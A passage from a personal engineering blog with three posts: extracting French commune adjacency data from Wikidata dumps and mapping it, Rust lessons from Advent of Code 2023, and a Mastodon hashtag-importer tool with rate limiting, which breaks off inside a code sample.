Linux Engineer's random thoughts

Viewing adjacent French towns on Wikipedia

2025-05-05T00:00:00+02:00

It all started with this really simple nerdsnipe by Joachim (french):

How many clicks would it take to go from the Wikipedia page of Cerbère (southernmost town of Metropolitan France) to that of Bray-les-Dunes (northernmost town of France), using only Wikipedia's "adjacent communes" links ?

Quite a simple question. Many surprises.

Querying Wikidata

So, we want to know how to go from one page to another, clicking links. This is a graph problem, where the nodes are towns, and edges are the links between adjacent towns. So we first need to get this graph of towns and their connections (edges).
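To make the graph framing concrete, here is a minimal sketch of a breadth-first search counting clicks between two towns. The adjacency map and the `clicks_between` name are illustrative assumptions, not code from this project.

```rust
use std::collections::{HashMap, HashSet, VecDeque};

/// Breadth-first search: returns the minimum number of clicks (edges)
/// needed to go from `start` to `goal`, or None if they are not connected.
fn clicks_between(graph: &HashMap<&str, Vec<&str>>, start: &str, goal: &str) -> Option<usize> {
    let mut seen: HashSet<&str> = HashSet::new();
    let mut queue: VecDeque<(&str, usize)> = VecDeque::new();
    seen.insert(start);
    queue.push_back((start, 0));
    while let Some((town, clicks)) = queue.pop_front() {
        if town == goal {
            return Some(clicks);
        }
        // A town missing from the map is treated as having no neighbours.
        for &next in graph.get(town).into_iter().flatten() {
            // `insert` returns false when the town was already visited.
            if seen.insert(next) {
                queue.push_back((next, clicks + 1));
            }
        }
    }
    None
}
```

Since every link costs exactly one click, a plain BFS is enough; no weighted shortest-path algorithm is needed.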

My first thought was simple: since this is on Wikipedia, why not query the structured data (more on that later) on Wikidata and see the result? Surely, a quick shortest-path on the resulting graph and it would quickly be done. Luckily there's a whole page on Wikidata's wiki on how to query the French towns' data. The query would look like this, even displayed directly as a graph! Wow, so simple; does it mean we're done? Nope, there's a catch: you can't use the Wikidata query service to get all the data, because there is just too much, and it does not support pagination either. So, one has to find another solution.

A kind soul is running the WDumper service, so I tried it. Unfortunately after 20+ days my query still hasn't completed. Luckily, after a few hours I had already lost patience and sought to address this another way…

The Wikidata dumps are big (for my poor RPi4)

So, let's get the full dumps instead. Those dumps are well documented and at the time of writing only take ~89GiB of disk space… compressed. They use lbzip2, which compresses well and can use multiple CPUs, nice! In addition, each entity is on a single line, so they can be processed independently. Time to whip out the cli text processing-fu!

First, one needs to download the dumps. Unfortunately, the most recent dump available on torrent is already a year old. And one needs to store all of this. In addition, when I wrote this project I was abroad, with a 35GB quota on a 4G connection. Luckily I always have at least one computer available remotely, and I settled on an RPi4 at home where I have a big disk attached and a fast internet connection.

So I went with curl initially, downloaded the latest dump over 12h or so and continued processing it. I would later find that the RPi4's anemic CPU would soon be an issue, so I re-downloaded it from multiple mirrors with aria2c (~25 minutes) on a cloud instance to saturate the bandwidth.

Before going into more details of processing this data, let's look into what we want from it…

What's a commune anyway?

It's an administrative status in France. In Wikidata parlance, it would be an item whose nature (property P31) is Q484170: a commune of France.

Communes are created and terminated all the time in France

At least, a few every year. Most of the time, those are mergers because it uses fewer resources and we are stronger together. So any data from the previous year is most probably already obsolete. In Wikidata, this is represented with the property "end date", a qualifier marking a statement as "ended at a given date"; it is used to filter out old towns.

Also, since 2019, Paris is no longer a "commune", but has a specific administrative status. Other people have queried Wikidata using "sub-class of" as a qualifier to get all types of items that would match. There are 7 such categories, which I did not use in my data extract for simplicity; in addition, Paris is currently not an instance of any of these categories; it uses yet another type. So I simply added an exception for Paris instead of filtering on its status itself.

Processing the data, line by line

Even using all available CPUs, extracting the file takes about 10 hours on the RPi4; and I didn't want to store the (presumably) huge json file, so everything is processed in a pipe. So to extract, I used lbzip2's lbzcat tool, which would allow starting the pipeline to do further processing.

Since this is json, I went with jq to extract the data. It started with a very simple (but wrong) query:

lbzcat latest-all.json.bz2 |tail -n+2 |sed 's/,$//' \
  | jq --indent 0  \
      'select(.claims.P31[]?.mainsnak.datavalue.value.id=="Q484170")
       | { id : .id, name: .labels.fr.value , conns: [ .claims.P47[]?.mainsnak.datavalue.value.id] }' \
    > communes.json

To process the json line by line we use tail to go directly to the second line and not be in an array; sed cleans up the trailing commas from the array. jq's indent 0 option makes sure we also have one line per item. We only select items whose claims include the property P31 (type) with value Q484170 (commune of France). The data is then re-formatted to only have the elements we care about: the unique id, the French name of the town, and its connections: the list of ids of the items in its P47 (shares-border-with) claims.

Note that in this version, there is no array in output: just one json object per line, and no trailing commas either.

This version is nice, but unfortunately quite slow; jq is single-threaded and will only use a single core.

`lbzcat` is slow, `grep` is faster than `jq`

I iterated quite a while over the query, and each time I realized my mistake, I had to wait 12+ hours (lbzcat + jq bottleneck) for the pipeline to complete. After a while I lost patience and rented temporary beefy instances to do the download and processing. And after a while, it hit me: I was duplicating too much work.

So, the trick I used to reduce the processing time was to store only the items that contain "Q484170":

lbzcat latest-all.json.bz2 | grep \"Q484170\" |lbzip2 --fast > contains-Q484170.json.bz2

GNU grep is also very optimized (and we could even go faster with hyperscan/ripgrep), so even if we get more data than we need, this saves us a lot of time.
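For illustration only, the same cheap pre-filter can be sketched in Rust: keep a line if it contains the quoted id, and drop the array's trailing comma. This is not what was run here (grep and sed did the job), and `commune_candidate` is a hypothetical name.

```rust
/// Returns the JSON text of a dump line if it mentions the commune type,
/// with the array's trailing comma removed; None for every other line.
fn commune_candidate(line: &str) -> Option<&str> {
    // Same cheap substring test as the grep above: no JSON parsing needed.
    if !line.contains("\"Q484170\"") {
        return None;
    }
    let line = line.trim_end();
    Some(line.strip_suffix(',').unwrap_or(line))
}
```

Like the grep version, this keeps false positives (any item that merely references Q484170); the precise selection is still left to the JSON-aware step.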

The temporary file only weighs 223MiB, which is much more manageable, and can be downloaded to be processed on my faster laptop, which can uncompress it in less than 30 seconds.

The final iteration of the processing looks like this:

echo [ > communes-new-only.json; \
    lbzcat contains-Q484170.json.bz2 | sed 's/,$//' | jq --indent 0 \
        'select(.claims.P47 != null and .claims.P31[]?.mainsnak.datavalue.value.id=="Q484170")
        | . as $r | .claims.P31[]?
        | select ($r.id == "Q90" or (.mainsnak.datavalue.value.id == "Q484170" and .qualifiers.P582 == null))
        | { id : $r.id, name: $r.labels.fr.value , conns: [ $r.claims.P47[]?.mainsnak.datavalue.value.id],
            coord: { latitude: $r.claims.P625[]?.mainsnak.datavalue.value.latitude,
                     longitude: $r.claims.P625[]?.mainsnak.datavalue.value.longitude}}' \
    | sed 's/$/,/' >> communes-new-only.json ; \
    truncate -s-2 communes-new-only.json; \
    echo ] >> communes-new-only.json

Wow, that's a lot of text and commands. Let's unfold what's new:

we now want to create a directly usable, valid json. For this, we first open and close an array in the first and last echo commands;
the second sed command adds commas at the end of each generated line;
in json, trailing commas aren't valid, so we trim the last one (and the newline after it) with the truncate -s-2 command;
and the jq query is now a bit more complex:
- we still only want items for which one of the types (P31) is a commune (Q484170);
- we filter for communes that do have other neighbouring communes, i.e., their P47 is not null;
- to ease manipulation, the root item is marked as $r, and we go matching into the .claims.P31[] array;
- then we start the selection; we can see here the special exception for Paris (Q90);
- otherwise, we look into the communes that don't have an end date (P582 is null), i.e., it's a proxy for inferring they still exist (we ignore any that would be ending in the future);
- we also added the target coordinates in the generated json.

Wikidata is not Wikipedia: the data is not that clean

Did I say that Wikidata is just the structured version of the data in Wikipedia? Well, I was wrong. Wikidata is an entirely separate database and project. There might have been imports of the data in the past, but obviously it's not kept in sync automatically. I know because I have found a few inconsistencies.

A few examples of issues I've seen:

Links between communes across France; For example Saint-Jacques-de-Néhou - Sault, (which I fixed):

Most of the time those are because of homonyms, but sometimes, there is no apparent good reason. There's even a query about this on the Wikidata wiki, but not all the results have been fixed yet.
Missing links; For example, Escorpain (which I fixed):

Which is weird because on the corresponding Wikipedia pages the adjacent towns are well documented. That's how I found that the Wikidata and Wikipedia data aren't really in sync; I've always thought that Wikidata was just an export of the infoboxes found on the Wikipedia pages. It is not. Of course, it's possible to write scripts and bots to do the sync, but by default it isn't done.
Incorrect coordinates; here Trois-Rivières:

This one is a recent commune (created in 2019), and its coordinates have already been fixed by someone else. And you can see in its article (french) that it does not have the French-Wikipedia-specific "shares border-with" section (it's a paragraph instead) that is (or was) the subject of this article.

Viewing the data

Apache ECharts is nice…

So, to view all of this, I started with Apache ECharts, a generic and full-featured js visualization library. I used the graph chart, with fixed coordinates to prevent the simulation of the force layout. In addition to this, I added a map layer to show the shape of France, generated by the France GeoJSON project.

It soon became apparent that I could not show all the data at once, so I added code to arbitrarily limit the number of nodes of the graphs to show, and their edges. One needs to zoom in enough to be able to see all the nodes and their links. You can look at what I came up with here.

but not the right tool for the job

Unfortunately there are bugs that I wasn't able to shake out: for example, the graph and map get de-synchronized when zooming. And the map wasn't very usable, including on mobile; I even reported one such issue.

With all this, I realized I just wasn't using the right tool for the job. I needed to start looking at libraries dedicated to viewing geographical data: maps.

Maplibre GL js

After a quick look at leaflet, I settled on Maplibre GL JS for performance reasons. Maplibre is a fork of all Mapbox libraries from the last open source version, and it has great engineering and documentation.

So I rewrote it all and transformed the graph into a GeoJSON structure, with nodes as circles. All the data was sent to the library without any filtering. And it was buttery-smooth, despite the 34830 nodes and 102094 edges, in addition to the GeoJSON background; I was able to throw away a lot of code and let Maplibre handle the performance details. Hopefully it's not too slow on your browser.
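As a rough sketch of what such a transformation can look like, the functions below build GeoJSON features as strings: a Point per town and a LineString per link. The `Town` struct and function names are assumptions for illustration (the actual viewer code is not shown in this article), and names are not JSON-escaped here.

```rust
/// A town with the fields kept by the extraction step (hypothetical struct).
struct Town {
    name: String,
    latitude: f64,
    longitude: f64,
}

/// GeoJSON Point feature for a node. GeoJSON positions are [longitude, latitude].
/// Note: `name` is inserted as-is; a real implementation must escape it.
fn node_feature(t: &Town) -> String {
    format!(
        r#"{{"type":"Feature","properties":{{"name":"{}"}},"geometry":{{"type":"Point","coordinates":[{},{}]}}}}"#,
        t.name, t.longitude, t.latitude
    )
}

/// GeoJSON LineString feature for an edge between two adjacent towns.
fn edge_feature(a: &Town, b: &Town) -> String {
    format!(
        r#"{{"type":"Feature","properties":{{}},"geometry":{{"type":"LineString","coordinates":[[{},{}],[{},{}]]}}}}"#,
        a.longitude, a.latitude, b.longitude, b.latitude
    )
}

/// Wraps already-serialized features into a FeatureCollection.
fn feature_collection(features: &[String]) -> String {
    format!(
        r#"{{"type":"FeatureCollection","features":[{}]}}"#,
        features.join(",")
    )
}
```

The longitude-first order is the part that is easy to get wrong when coming from "latitude, longitude" data such as the extract above.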

The maps previously included in this article are in fact based on the viewing code integrating Maplibre I came up with. I copy/pasted examples from the doc and added a filter by name, center and zoom coordinates parameters. Here is another example viewing the smallest commune of France by area (Castelmoron-d’Albret):

And the largest:

Or the commune with a population of 1, Rochefourchat:

… what's the answer by the way?

Oh yes, that question, of the number of clicks... Well, I did not get to that part, but someone else did.

But they did it using another data source from the French government, itself extracted from OpenStreetMap. The dataset was extracted in 2022, so it's probably obsolete; the towns are referenced by their unique INSEE ID, which is also in Wikidata (property P374), so it could be compared to the dataset I extracted pretty easily. This is left as an exercise to the reader.

What I learned during Advent of Code 2023

2023-12-27T20:00:00+01:00

Advent of Code is an Advent calendar of small programming puzzles. I participated in this year's edition, finishing it for the second time in a row. The puzzles of all editions are always accessible.

The principle is to read the problem, get a puzzle input (more or less tailored to your account), process it any way you like (with code you wrote, most of the time), and then put the (short) result into the website for it to validate your answer.

I wrote solutions in Rust again this year, so let's see what I learned about the language, trying to reveal as little as possible from this year's problems.

Rust

Tuples

In Rust, tuples are comparable, hashable, and have default values (as long as their fields are and do). This is very handy to sort a list of tuples or to initialize them with Default::default(), and it makes for shorter code.
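A small sketch of these three properties, with made-up function names:

```rust
use std::collections::HashSet;

/// Sorts (score, name) pairs: tuples compare field by field, left to right.
fn sorted_pairs(mut pairs: Vec<(u32, &str)>) -> Vec<(u32, &str)> {
    pairs.sort();
    pairs
}

/// Counts distinct (x, y) positions: tuples of hashable types are hashable.
fn distinct_positions(positions: &[(i32, i32)]) -> usize {
    positions.iter().collect::<HashSet<_>>().len()
}

/// A tuple's default value is the tuple of its fields' defaults.
fn origin() -> (i32, i32, bool) {
    Default::default()
}
```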

Iterators

I started this year with an idea of solving the puzzles (that could) in a single pass. But I still want the parsing to be separate from the algorithmic resolution. For that, instead of parsing the input data into a Vec, the parsing function would return an iterator. This is what I put in my template:

type ParsedItem = u8;
fn parse(input: &str) -> impl Iterator<Item = ParsedItem> + Clone + '_ {
    input.lines().map(|x| x.parse().expect("not int"))
}

The idea would be to change the type of the parsed item, and edit the parser to return this type.

Note: the Iterator has to be Clone because I'm using it twice, once for part 1, and another for part 2. It has a lifetime because it borrows from the input, which is an &str with the same lifetime.

I'm aware that this means that the parsing would happen twice, once for each part, sort of defeating the point of a "single pass".
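Here is a sketch of how such a template can be wired to both parts. `part1`, `part2` and `solve` are placeholders, not actual puzzle solutions.

```rust
type ParsedItem = u8;

fn parse(input: &str) -> impl Iterator<Item = ParsedItem> + Clone + '_ {
    input.lines().map(|x| x.parse().expect("not int"))
}

/// Hypothetical part 1: sum of all items.
fn part1(items: impl Iterator<Item = ParsedItem>) -> u32 {
    items.map(u32::from).sum()
}

/// Hypothetical part 2: largest item.
fn part2(items: impl Iterator<Item = ParsedItem>) -> Option<ParsedItem> {
    items.max()
}

fn solve(input: &str) -> (u32, Option<ParsedItem>) {
    let items = parse(input);
    // Cloning copies the lazy iterator, not parsed values: each part re-parses.
    (part1(items.clone()), part2(items))
}
```

The clone is cheap because nothing has been parsed yet when it happens; the cost is paid again each time the iterator is consumed.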

For days 1, 2, 4, 7, 9, 12, 13, 15, 18, 19 and 22, this approach worked well. But for days 5, 6, 8 and 20 I removed the iterator approach from parsing entirely. For days 3, 24 and 25, I wrote the parsing as an iterator, and then immediately used .collect() to put it in a collection data structure. For grid problems, I initially did the same: iterator, then collect (10, 11, 14); but caught on and removed the iterator as well for days 16, 17, 21 and 23.

What this shows is that there is no magic solution, it always depends on the problem. I think I learned enough about iterators, so that next time I might go back to a simpler approach.

Enums vs raw data comparison

Last year, in my solutions everything was parsed to an abstract representation and had a given data type. This year I opted for a simpler approach, mostly for speed of writing: when needed, compare a char directly in the code. It makes it less abstract, but the code is mostly write-only.

This contrasts with the Iterator approach: as I master more Rust features, I use them a bit less, only when I deem necessary. I used enum representation for 4 out of 25 days.

`u8` vs `char`

In Rust, char represents a Unicode scalar value, roughly the equivalent of a rune in Go or wchar_t in C. But during AoC, all input is purely ASCII, so it is overkill to use a 4-byte type to represent 1 byte of data. I started the month using Vec<char> for grid rows, but finished the month mostly using Vec<u8>. ASCII u8 literals are possible by prefixing b to a single-quoted character: b'@'.
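A minimal sketch of the byte-based approach; the helper names are invented for the example:

```rust
use std::mem::size_of;

/// Sizes in bytes of `char` and `u8`.
fn sizes() -> (usize, usize) {
    (size_of::<char>(), size_of::<u8>())
}

/// Parses an ASCII grid into rows of bytes, one Vec<u8> per line.
fn parse_grid(input: &str) -> Vec<Vec<u8>> {
    input.lines().map(|line| line.as_bytes().to_vec()).collect()
}

/// Counts the cells holding a given ASCII byte, e.g. b'@'.
fn count_cells(grid: &[Vec<u8>], wanted: u8) -> usize {
    grid.iter().flatten().filter(|&&c| c == wanted).count()
}
```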

Borrow checker

I'm getting much better at guessing when something would or wouldn't trip the borrow checker (except maybe day 20 where I was a bit too optimistic). So often I won't use iter(), but use indexed accesses if I need to modify multiple arbitrary elements during an iteration.

I'll often take shortcuts too, and use multiple cloned Strings instead of &str.

When needing to add memoization to a recursive algorithm, I noticed again that one couldn't use the Entry api of HashMap, because it borrows from the HashMap.
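The usual workaround is to look up first, recurse, then insert. A sketch with a stand-in recursive function (`ways` is not from any puzzle):

```rust
use std::collections::HashMap;

/// Counts the ways to climb `n` steps taking 1 or 2 at a time (a stand-in
/// for any recursive puzzle function), caching results in `memo`.
fn ways(n: u64, memo: &mut HashMap<u64, u64>) -> u64 {
    if n <= 1 {
        return 1;
    }
    // `memo.entry(n).or_insert_with(|| ways(n - 1, memo) + ...)` does not
    // compile: the entry keeps `memo` mutably borrowed while the closure
    // needs it again. So: look up first, recurse, then insert.
    if let Some(&cached) = memo.get(&n) {
        return cached;
    }
    let result = ways(n - 1, memo) + ways(n - 2, memo);
    memo.insert(n, result);
    result
}
```

This hashes the key twice (once for `get`, once for `insert`), which is the price of not holding a borrow across the recursive calls.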

`usize`-only indexing is still annoying

Not really a new learning, but it is still as annoying as before that one cannot index slices with any integer type other than usize. It makes the type pervasive when wanting to write code quickly. To avoid repeated casts, I often have two variables with the same data, one of which is cast to usize.

I think the Rust compiler could allow indexing with any unsigned type smaller than the current platform's usize without any loss of correctness. I realize this is not as trivial because of the way slices implement the Index trait, but this would improve ergonomics. It could even add additional bounds checking when indexing with signed negative numbers, but I realize this would go against "zero cost abstractions".
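In the meantime, a small helper can hide the conversion. This is only a sketch of one possible workaround, with hypothetical names, not something from my solutions:

```rust
use std::convert::TryFrom;

/// Looks up `slice[i]` for a signed index, returning None when `i` is
/// negative or past the end instead of panicking.
fn get_signed<T>(slice: &[T], i: i64) -> Option<&T> {
    usize::try_from(i).ok().and_then(|i| slice.get(i))
}

/// Same idea for a 2D grid addressed with signed (x, y) coordinates.
fn cell(grid: &[Vec<u8>], x: i64, y: i64) -> Option<u8> {
    get_signed(grid, y)
        .and_then(|row| get_signed(row.as_slice(), x))
        .copied()
}
```

The bounds check is explicit here, so a neighbour lookup like `cell(&grid, x - 1, y)` on the left edge simply yields None.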

Z3

As a given problem was quite complex, I had to resort to using a solver. I chose one of the most used nowadays, z3, and its library's Rust bindings. Since it depends on a C++ library, it was a bit challenging.

Despite what the doc said, there were no examples (I'm not the only one who noticed). Luckily, another crate, z3d, had examples for its uses that also included the z3 equivalent code.

It did not build on Fedora because the published crate did not use pkg-config to find z3.h, but a hardcoded path instead. It provided environment variables to configure this, but this isn't exactly the most portable way to build a dependency, since I wanted the project to build in the (ubuntu-based) github action CI, as well as my Fedora laptop.

The crate z3-sys (low-level bindings) has an embedded version of the z3 library that it could use instead with a feature flag, but this is a big project, and it takes a bit long to build on my laptop. In the end, I moved to the git version of z3 which added pkg-config support, and it works flawlessly on both my laptop and the CI.

I was also a bit annoyed by the ergonomics of using z3 directly; I saw that z3d provides an additional abstraction layer to make it a bit more ergonomic, but I did not try it.

ints helper

One of AoC's often recommended helpers to have in your "toolbox" is a function that parses multiple integers. I finally wrote one (it returns an Iterator), and while it had a rough start, I still used it for 5 different problems.
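My own helper isn't reproduced here, but a minimal sketch of such a function, under the assumption that a '-' directly before a digit is a sign, could look like this:

```rust
/// Yields every integer found in `s`, ignoring any other text between them.
/// A '-' directly before a digit is treated as a sign, so "3-4" gives 3, -4.
/// Iteration stops early if a number does not fit in an i64.
fn ints(s: &str) -> impl Iterator<Item = i64> + '_ {
    let bytes = s.as_bytes();
    let mut i = 0;
    std::iter::from_fn(move || {
        // Skip to the next digit.
        while i < bytes.len() && !bytes[i].is_ascii_digit() {
            i += 1;
        }
        if i == bytes.len() {
            return None;
        }
        // Include a directly preceding '-' as the sign.
        let start = if i > 0 && bytes[i - 1] == b'-' { i - 1 } else { i };
        while i < bytes.len() && bytes[i].is_ascii_digit() {
            i += 1;
        }
        s[start..i].parse().ok()
    })
}
```

The sign handling is the usual source of the "rough start": inputs that use '-' as a range separator need the unsigned variant instead.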

I also finally wrote common LCM and GCD code for reuse.
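For reference, a sketch of what such reusable code usually looks like (Euclid's algorithm; not necessarily identical to mine):

```rust
/// Greatest common divisor, using Euclid's algorithm.
fn gcd(mut a: u64, mut b: u64) -> u64 {
    while b != 0 {
        let r = a % b;
        a = b;
        b = r;
    }
    a
}

/// Least common multiple; divides before multiplying to limit overflow.
fn lcm(a: u64, b: u64) -> u64 {
    if a == 0 || b == 0 {
        0
    } else {
        a / gcd(a, b) * b
    }
}

/// LCM of a whole list, e.g. to combine several cycle lengths.
fn lcm_all(values: &[u64]) -> u64 {
    values.iter().fold(1, |acc, &v| lcm(acc, v))
}
```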

Small things

I usually comment out the debug statements after finishing. For debug helpers, I now start them with an _ (underscore) so that it won't show an unused code warning anymore.

Incremental debugging: just like LSPs, running the program in a loop in another window to see the output of debug statements during parsing is very useful.

Algorithms and general tricks

Grid iteration

When working with grids, one should pick a coordinate system, and stick with it all the time. I use mostly (x, y); but (row, column) makes a lot of sense, especially for grid indexing.

I have become quite proficient at grid iteration now. The main tricks I use are lifted from watching Jonathan Paulson's real-time solves. The first is to just iterate over an inline array of offsets:

for dir in [(0, -1), (1, 0), (0, 1), (-1, 0)].into_iter()

And then for each, just check if they go over the map boundaries.

But that's just the beginning: if you need to remember in which direction you're heading, just use a number from 0 to 3, making them consecutive, clockwise for example: North = 0, East = 1, South = 2, West = 3. Then you can use very simple math operations to change directions:

to rotate 90° clockwise, just add 1 (and then modulo 4). Add 3 (and then modulo 4) for -90° (or 270°).
to go in the opposite direction, add 2 (and then modulo 4).

You can also use the direction as an index into the array I showed in the above example. This modeling greatly simplifies code for grid problems.
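Put together, the direction tricks above can be sketched like this (function names are made up; y grows downwards, as is usual when reading a grid line by line):

```rust
/// Offsets as (dx, dy) with y growing downwards, indexed by direction:
/// North = 0, East = 1, South = 2, West = 3.
const DIRS: [(i32, i32); 4] = [(0, -1), (1, 0), (0, 1), (-1, 0)];

fn turn_right(dir: usize) -> usize {
    (dir + 1) % 4
}

fn turn_left(dir: usize) -> usize {
    (dir + 3) % 4
}

fn reverse(dir: usize) -> usize {
    (dir + 2) % 4
}

/// Moves one step from (x, y) in direction `dir`; None when leaving the grid.
fn step(x: usize, y: usize, dir: usize, width: usize, height: usize) -> Option<(usize, usize)> {
    let (dx, dy) = DIRS[dir];
    let nx = x as i32 + dx;
    let ny = y as i32 + dy;
    if nx < 0 || ny < 0 || nx >= width as i32 || ny >= height as i32 {
        return None;
    }
    Some((nx as usize, ny as usize))
}
```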

Tortoise and Hare: not this year

A few times this year, detecting a cycle was necessary, and I thought I could reuse something I learned from last year (and the code I wrote). But this wasn't necessary.

Floyd's tortoise and hare algorithm is very useful to detect when a cycle has happened in a series of comparable things. It can return the start of the first cycle, and its period. But it's only really useful when there are hidden dependencies between different states of the series. If a given value always gives the same next state, then using Tortoise and Hare is overkill, and a simple set is sufficient.
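A sketch of the simpler approach, assuming the next state depends only on the current one. It uses a map rather than a plain set so that the start and the length of the cycle come for free; `find_cycle` is a hypothetical helper.

```rust
use std::collections::HashMap;
use std::hash::Hash;

/// Iterates `next` from `start` until a state repeats.
/// Returns (index of the first state of the cycle, cycle length).
fn find_cycle<S, F>(start: S, next: F) -> (usize, usize)
where
    S: Clone + Eq + Hash,
    F: Fn(&S) -> S,
{
    // Maps each state to the step at which it was first seen.
    let mut seen: HashMap<S, usize> = HashMap::new();
    let mut state = start;
    let mut i = 0;
    loop {
        if let Some(&first) = seen.get(&state) {
            return (first, i - first);
        }
        seen.insert(state.clone(), i);
        state = next(&state);
        i += 1;
    }
}
```

Unlike tortoise and hare, this stores every state seen so far, which is fine when states are small and the cycle appears quickly.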

Transposition

At least one time, I wrote quite complex code that could have been greatly simplified using transposition. No need to make an algorithm work in all four directions, if a simple transposition can make you apply it to a different direction.

To transpose a grid, iterate over columns first instead of rows to generate another grid. Then you can transpose again to get the original grid back.
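A minimal sketch for rectangular grids (it panics if rows have different lengths); the names are illustrative:

```rust
/// Transposes a rectangular grid: rows become columns.
fn transpose<T: Clone>(grid: &[Vec<T>]) -> Vec<Vec<T>> {
    let width = grid.first().map_or(0, |row| row.len());
    (0..width)
        .map(|x| grid.iter().map(|row| row[x].clone()).collect())
        .collect()
}

/// Rotates 90° clockwise: transpose, then flip each row horizontally.
fn rotate_cw<T: Clone>(grid: &[Vec<T>]) -> Vec<Vec<T>> {
    let mut rotated = transpose(grid);
    for row in &mut rotated {
        row.reverse();
    }
    rotated
}
```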

This can be combined with horizontal or vertical flipping in order to do a rotation. All of this was explained in HyperNeutrino's solution explanation for a given day (contains spoilers).

Shoelace formula and Pick's theorem

These two showed up twice. The first time they weren't mandatory (ray casting was sufficient), but as I looked at other people's solutions, I noticed how elegant it was; so I used it for the other day, when it was finally mandatory.

The shoelace formula gives the area of an arbitrary simple polygon from its vertices' coordinates. Pick's theorem relates the area of a polygon whose vertices have integer coordinates to the number of integer points inside it and on its boundary, which is what makes it interesting here.

So if one wants to count the points inside a polygon (with integer coordinates), the idea is to first compute the area A of the polygon with the shoelace formula, then use Pick's theorem to get the number i of points inside:

i = A - b / 2 + 1

b here is the number of points with integer coordinates on the polygon edge. So on a segment with integer bounds, all integer points on it should also be counted.

In addition, when working on a grid where the cells on the edge are part of the shape, the b points on the edge should be counted as well: the total is then i + b.
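As a worked sketch of the two formulas combined (hypothetical function names, integer vertices listed in order around the polygon):

```rust
fn gcd(mut a: i64, mut b: i64) -> i64 {
    while b != 0 {
        let r = a % b;
        a = b;
        b = r;
    }
    a
}

/// Consecutive vertex pairs, including the closing edge back to the start.
fn edges(vertices: &[(i64, i64)]) -> impl Iterator<Item = ((i64, i64), (i64, i64))> + '_ {
    (0..vertices.len()).map(move |k| (vertices[k], vertices[(k + 1) % vertices.len()]))
}

/// Twice the area from the shoelace formula (kept doubled to stay in integers).
fn doubled_area(vertices: &[(i64, i64)]) -> i64 {
    edges(vertices)
        .map(|((x1, y1), (x2, y2))| x1 * y2 - x2 * y1)
        .sum::<i64>()
        .abs()
}

/// Integer points on the boundary: gcd(|dx|, |dy|) per edge.
fn boundary_points(vertices: &[(i64, i64)]) -> i64 {
    edges(vertices)
        .map(|((x1, y1), (x2, y2))| gcd((x2 - x1).abs(), (y2 - y1).abs()))
        .sum()
}

/// Pick's theorem: i = A - b / 2 + 1, computed as (2A - b + 2) / 2.
fn interior_points(vertices: &[(i64, i64)]) -> i64 {
    (doubled_area(vertices) - boundary_points(vertices) + 2) / 2
}
```

For the square with corners (0, 0) and (4, 4), A is 16 and b is 16, so i = 16 - 8 + 1 = 9: the 3x3 block of points strictly inside.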

Gaussian Elimination

This one I put here, but did not learn. That's where I decided to use z3 instead. But I'm now aware that in order to solve multiple linear equations, there exists Gaussian Elimination, an algorithmic approach using matrices.

Visualization and input analysis

For Advent of Code, it's not required to write a general solution to every problem. Only one that solves it for the current input. Some problems might seem intractable in the general case, but after analyzing the input, it might in fact be specially crafted to have a simple solution, or other properties.

So for this edition, I learned to use Graphviz's dot language in order to generate graphs. Those can also be used for debugging graphs much more visually than ASCII text.
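Generating dot from a solution takes only a few lines. A sketch for an undirected graph, with a made-up `to_dot` helper:

```rust
/// Renders an undirected graph in Graphviz's dot language.
/// Node names are quoted as-is; names containing '"' would need escaping.
fn to_dot(edges: &[(&str, &str)]) -> String {
    let mut out = String::from("graph g {\n");
    for (a, b) in edges {
        out.push_str(&format!("  \"{}\" -- \"{}\";\n", a, b));
    }
    out.push_str("}\n");
    out
}
```

The output can then be rendered with something like `dot -Tsvg graph.dot -o graph.svg`.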

Closing the gap on fediverse hashtag visibility with hashtag-importer

2023-10-02T00:00:00+02:00

I have released a small application, hashtag-importer, that users of a Mastodon instance can use to slowly import more content from low-traffic hashtags, into their instance (with their admin's permission).

Why hashtag-importer

In the fediverse, your server might not see all posts made by everyone; it should only see posts that appear in anyone's timeline. So if no one on your server follows a user, you won't see their posts, even if you're subscribed to a hashtag and they use that hashtag. If your Mastodon instance is small, you'll often have niche hashtags being unusable. For server admins, a simple solution is to use relays, and Mastodon supports it. But what if you're not admin ? That's where hashtag-importer comes in.

How it works

Most servers (but not all) have publicly-available hashtag timelines. You can use those to get new posts from hashtags of your interests elsewhere. But wouldn't it be better to be able to read those on all your Mastodon clients, directly from your instance ?

The second part is in fact very simple, and a "core" part of the fediverse user experience: copy/pasting links to posts. If you paste a link to a post in your instance's search, the server will fetch the post, and become "aware" of it; it will have been imported, just as if it had appeared in someone's timeline. It will become available on the global timeline and indexed hashtag timelines. So that's what hashtag-importer does, it automates this copy/pasting.

Crates galore

hashtag-importer is written in Rust, and relies on reqwest for HTTP requests (in blocking mode only, life is too short for async™), toml and serde for the config file, clap for argument parsing, webbrowser for opening a webpage to get permissions, anyhow for care-free error management and governor for rate-limiting. Building pulls about 160 crates in total with transitive dependencies. I'm usually wary of adding too many dependencies, but this time I didn't hold back, and it shows. At least one of those isn't really necessary, I'll let you guess which one ;-) (Update: it has been removed)

There's little practical advantage to using Rust here, it was mostly done for fun. I've written small tools like this in go or python that can be just as reliable. I wanted to see what the ergonomics of writing this type of client code in rust were, and it works well in general. The main service loop ended up being a bit long, but that's only because I haven't taken the time to split it properly (Update: it was split).

Rate-limiting

Before writing this tool, I asked my Mastodon instance admins, the Treehouse Staff, what they thought of the idea, and if they would be opposed to adding this type of invisible automation. They suggested that I should add rate-limits:

"1 req/min, 20/hr […] with some sort of per-upstream limiting".

As I was almost done, I realized that my strategy of sprinkling calls to sleep() around the code was not going to cut it. That's why I turned to the governor crate, which implements GCRA, a well known leaky-bucket rate-limiting algorithm. It made things very simple, except for the fact that hashtag-importer did not use async, even for network code; and the governor crate only provided a way to wait for resolution using an async fn. So I had to add blocking helpers to wait for the next rate-limit deadline (~12 lines of code).
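To give an idea of what GCRA does, here is a self-contained sketch using only the standard library. It is not governor's API nor the helper from hashtag-importer; the `Gcra` type and its methods are invented for the example.

```rust
use std::time::{Duration, Instant};

/// Minimal GCRA limiter: one request per `interval`, with up to `burst`
/// requests allowed back to back.
struct Gcra {
    interval: Duration,
    tolerance: Duration,
    /// Theoretical arrival time of the next conforming request.
    tat: Instant,
}

impl Gcra {
    fn new(interval: Duration, burst: u32, now: Instant) -> Self {
        Gcra {
            interval,
            tolerance: interval * burst.saturating_sub(1),
            tat: now,
        }
    }

    /// Ok(()) if a request may go out at `now`, else Err(how long to wait).
    fn check(&mut self, now: Instant) -> Result<(), Duration> {
        let limit = now + self.tolerance;
        if self.tat > limit {
            return Err(self.tat.duration_since(limit));
        }
        // Conforming request: push the theoretical arrival time forward.
        self.tat = self.tat.max(now) + self.interval;
        Ok(())
    }

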